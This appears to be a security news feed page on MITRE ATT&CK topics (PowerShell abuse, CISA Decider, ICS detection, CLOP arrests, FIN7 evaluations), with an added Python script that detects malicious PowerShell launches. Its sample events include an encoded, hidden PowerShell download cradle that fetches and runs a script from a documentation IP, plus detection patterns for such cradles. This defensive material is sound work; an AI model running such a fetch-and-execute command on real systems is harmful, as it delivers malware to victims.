Hunter-Killer Malware Tactic Growing: Stealthy, Persistent and Aggressive

A malware tactic dubbed ‘hunter-killer’ is growing, based on an analysis of more than 600,000 malware samples. This may become the standard approach for advanced attacks.

All About PowerShell Attacks: The No. 1 ATT&CK Technique

How do cyber pros prioritize their security efforts? A good place to start is knowing exactly which tactics, techniques and procedures (TTPs) threat actors use. A recently published report used aggregated data to identify the most common attack techniques as defined by the MITRE ATT&CK framework. The study revealed that PowerShell Command & […]

The post All About PowerShell Attacks: The No. 1 ATT&CK Technique appeared first on Security Intelligence.
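
The teaser above names PowerShell (ATT&CK T1059.001, Command and Scripting Interpreter: PowerShell) as the top technique. What follows is an added example, not code from the Security Intelligence post or from the report it summarizes, of the triage a detection engineer would run over process-creation events to surface abusive PowerShell launches and tag them with ATT&CK IDs. The event records, the Office parent path and the 192.0.2.10 URL are constructed sample data; the indicator patterns and the technique IDs chosen for each indicator (T1059.001, T1027, T1564.003, T1105) are this example's own mapping, not anything the report defines.

```python
"""Triage PowerShell process-creation events and tag them with ATT&CK IDs.

Added example, not code from the original post. The event records and the
remote URL are constructed for illustration; the field names mimic a parsed
Windows process-creation event (Sysmon EID 1 / Security EID 4688).
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set


# --- constructed sample events ---------------------------------------------
def _encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way an attacker would: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')")},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\System32\notepad.exe"},
]

# --- detection logic ---------------------------------------------------------
POWERSHELL_RE = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# powershell.exe accepts abbreviated parameter names, so -e/-ec/-en/-enc all select -EncodedCommand.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden\b", re.I)
BYPASS_RE = re.compile(r"-(?:ep|executionpolicy)\s+bypass\b", re.I)
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


@dataclass
class Finding:
    command_line: str
    techniques: Set[str] = field(default_factory=set)
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None

    @property
    def score(self) -> int:
        return len(self.reasons)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent or invalid."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
        return None


def analyze(event: dict) -> Optional[Finding]:
    """Score one process-creation event; None if it is not a PowerShell launch."""
    cmd = event["CommandLine"]
    if not POWERSHELL_RE.search(cmd):
        return None
    f = Finding(cmd, techniques={"T1059.001"})  # Command and Scripting Interpreter: PowerShell
    f.decoded = decode_encoded_command(cmd)
    scan = cmd
    if f.decoded:
        f.reasons.append("encoded command")
        f.techniques.add("T1027")  # Obfuscated Files or Information
        scan += " " + f.decoded  # inspect the decoded payload, not just the wrapper
    if HIDDEN_RE.search(cmd):
        f.reasons.append("hidden window")
        f.techniques.add("T1564.003")  # Hide Artifacts: Hidden Window
    if BYPASS_RE.search(cmd):
        f.reasons.append("execution policy bypass")
    if DOWNLOAD_RE.search(scan):
        f.reasons.append("download cradle")
        f.techniques.add("T1105")  # Ingress Tool Transfer
    if IEX_RE.search(scan):
        f.reasons.append("in-memory execution via Invoke-Expression")
    if event["ParentImage"].rsplit("\\", 1)[-1].lower() in OFFICE_PARENTS:
        f.reasons.append("spawned by an Office application")
    return f


def triage(events: List[dict]) -> List[Finding]:
    """All PowerShell launches in the batch, highest-scoring first."""
    findings = [f for f in map(analyze, events) if f is not None]
    return sorted(findings, key=lambda f: f.score, reverse=True)


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding.score, sorted(finding.techniques), finding.reasons)
```

Two design points matter in practice. The indicators that make the second event dangerous (the download cradle and Invoke-Expression) live only inside the base64 blob, so matching on the raw command line without decoding it would miss them; decoding as UTF-16LE is what powershell.exe itself does. And -NoProfile is deliberately not scored, since a great deal of legitimate automation uses it; the hidden window, the encoded payload and the Office parent are the signals that separate the malicious launch from the backup script.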

New CISA Tool ‘Decider’ Maps Attacker Behavior to ATT&CK Framework

CISA has released a free, open source tool that makes it easier to map an attacker’s TTPs to the MITRE ATT&CK framework.
The post New CISA Tool ‘Decider’ Maps Attacker Behavior to ATT&CK Framework appeared first on SecurityWeek.

How to improve threat detection in ICS environments

A challenge in industrial control systems (ICS) cybersecurity is the lack of detection and collection capability within most ICS environments. Security leaders can struggle to piece together the complete attack chain in actual ICS incidents because the environments cannot collect the required evidence. A new report, “2021 MITRE Engenuity ATT&CK Evaluations for ICS,” produced by Dragos, evaluates the ICS threat detection market and gives a realistic demonstration of an attack against an operational technology environment. The report details the purpose of the ATT&CK Evaluations for ICS and the lessons learned from the evaluation results, including:

- How the MITRE ATT&CK for ICS framework was developed
- A breakdown of the ATT&CK Evaluations for the ICS scenario, including the emulated attack approach and the ICS environment
- The ATT&CK Evals results and how Dragos performed
- Benefits to the ICS cybersecurity community

Learn more on the ATT&CK Evaluations and how to accelerate digital transformation securely to manage growing risks to protect core business operations. This article was produced by CyberScoop […]

The post How to improve threat detection in ICS environments appeared first on CyberScoop.

Ukrainian Police Nab Six Tied to CLOP Ransomware

Authorities in Ukraine this week charged six people alleged to have been part of the CLOP ransomware group, a cybercriminal gang said to have extorted more than half a billion dollars from victims. Some of CLOP’s victims this year alone include Stanford University Medical School, the University of California, and the University of Maryland.

5 Things to Do with MITRE ATT&CK – Tips and Tricks Special

MITRE ATT&CK stands for MITRE Adversarial Tactics, Techniques and Common Knowledge. It’s a curated knowledge base of adversarial behavior based on real-world observation of APT campaigns. The original impetus for the project was to answer the quest…

Can software vendors block a notorious criminal group’s attacks? MITRE wants to find out

The Eastern European hacking group FIN7 has stolen an estimated $1 billion in recent years by sweeping up payment card data processed by hotels and other organizations. The fortune amassed by FIN7, despite the arrest of some of its senior members, has made it one of the most potent criminal threats to organizations around the world. Changes the group has made to its hacking tools in recent months have meant more breaches, and likely more money, for FIN7. Now, a U.S. government-funded organization is trying to put a dent in FIN7 hacks by evaluating the group’s attack techniques against widely used cybersecurity software. Vendors will be assessed on their ability to block FIN7-like intrusions and, with the results made public next year, hopefully improve their products. While FIN7 is the subject of the evaluation, the attack techniques tested will “be applicable across a broad spectrum of adversaries,” said Frank Duff, […]

The post Can software vendors block a notorious criminal group’s attacks? MITRE wants to find out appeared first on CyberScoop.

How would MITRE’s popular cyberattack framework apply to industrial control systems?

A document that cybersecurity professionals consult in analyzing hacking groups will soon expand to include attack techniques used against industrial control systems, a recognition of the growing number of adversaries that target critical infrastructure. The goal is to help organizations understand and defend against disruptive cyberattacks like the one that cut power for some 225,000 people in Ukraine in 2015. That means filling in gaps in the cybersecurity community’s knowledge base of the hacking methods that are unique to industrial environments as well as those that also apply to IT networks. The document, known as the “ATT&CK” framework, should account for the “full gamut of adversary behavior,” said Otis Alexander, one of the lead cybersecurity engineers who helps maintain it at MITRE Corp., a federally funded not-for-profit organization. The updated framework could be available to network defenders as soon as December. It will cover attacks against ICS protocols and ways in which hackers might hinder incident response, Alexander said at MITRE’s ATT&CKcon conference […]

The post How would MITRE’s popular cyberattack framework apply to industrial control systems? appeared first on CyberScoop.
